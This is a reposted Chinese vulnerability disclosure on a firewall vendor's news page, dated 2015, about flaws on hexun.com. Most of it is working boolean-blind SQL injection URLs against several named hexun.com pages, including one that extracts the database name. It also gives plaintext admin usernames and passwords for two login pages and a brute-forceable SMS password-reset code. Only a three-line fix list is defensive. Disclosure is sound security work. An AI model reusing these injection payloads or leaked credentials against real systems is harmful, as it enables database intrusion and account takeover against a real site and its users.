English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 威盾新闻 >> SQL注入漏洞多处+弱口令+任意密码重置
 

SQL注入漏洞多处+弱口令+任意密码重置

威盾防火墙 2015-01-08
 

第一处

http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15

start_date参数存在注入

 

http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20'1'='1 //返回正确
 http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20'2'='1 // 返回错误
 http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20SUBSTRING(DB_NAME(),1,1)='d'%20and%20'1'='1 //返回正确
 http://funds.money.hexun.com/fundsdata/compare/data22.aspx?s_id=2393&link_str=open&filter_str=&order_str=fld_sumvalue%20desc&start_date=2012-12-15'%20and%20SUBSTRING(DB_NAME(),1,7)='db_info'%20and%20'1'='1 //数据库为db_info





第二处

http://stockdata.stock.hexun.com/2008/sdgd.aspx?stockid=600053&accountdate=2004-12-31

stockid和accountdate参数存在注入

 

http://stockdata.stock.hexun.com/2008/sdgd.aspx?stockid=600053'%2and 1=1 and%20'1'='1&accountdate=2004-12-31 //返回正确
 http://stockdata.stock.hexun.com/2008/sdgd.aspx?stockid=600053'%20and 1=2 %20'2'='1&accountdate=2004-12-31 //返回错误
 http://stockdata.stock.hexun.com/2008/sdgd.aspx?stockid=600053'%20and%20%201=1%20and%20'1'='1&accountdate=2004-12-31 //返回正确
 http://stockdata.stock.hexun.com/2008/sdgd.aspx?stockid=600053'%20and%20%201=2%20and%20'1'='1&accountdate=2004-12-31 //返回错误





第三处

http://data.stock.hexun.com/hxclub/Ranking/zyywsr.aspx?date=2011-06-30&tag=desc&sort=2

date参数

 

http://data.stock.hexun.com/hxclub/Ranking/zyywsr.aspx?date=2011-06-30'%20and%201=1%20and%20'1'='1&tag=desc&sort=2 //返回正确
 http://data.stock.hexun.com/hxclub/Ranking/zyywsr.aspx?date=2011-06-30'%20and%201=2%20and%20'1'='1&tag=desc&sort=2 //返回错误

0x02弱口令两处





 

http://testwap.hexun.com/admin/index.jsp
用户名admin 密码111111
http://315.stock.hexun.com/login.action#
用户名hrstock
密码hrstock2012



 



 

 

0x03 任意用户密码重置

https://reg.hexun.com/getpassword.aspx

当找回密码时,会给手机发送5位的验证码,没有次数限制,可以fuzzing

得到验证码,可以重置任意用户

漏洞修补建议:

1.过滤验证

2.更改用户名密码

3.限制验证次数

 
相关内容: 最新内容:
WEB第三方应用SQL语句安全规范[2015-01-08]
DEDECMS数据库执行原理、CMS代码层SQL注入防御思路[2015-01-08]
PHP网站SQL注入防御问题[2015-01-08]
SQL注入与ASP木马上传[2015-01-08]
sql注入防御[2015-01-08]
SQL注入攻击的原理及其防范措施[2015-01-08]
 WEB第三方应用SQL语句安全规范[2015-01-08]
DEDECMS数据库执行原理、CMS代码层SQL注入防御思路[2015-01-08]
PHP网站SQL注入防御问题[2015-01-08]
SQL注入与ASP木马上传[2015-01-08]
sql注入防御[2015-01-08]
SQL注入攻击的原理及其防范措施[2015-01-08]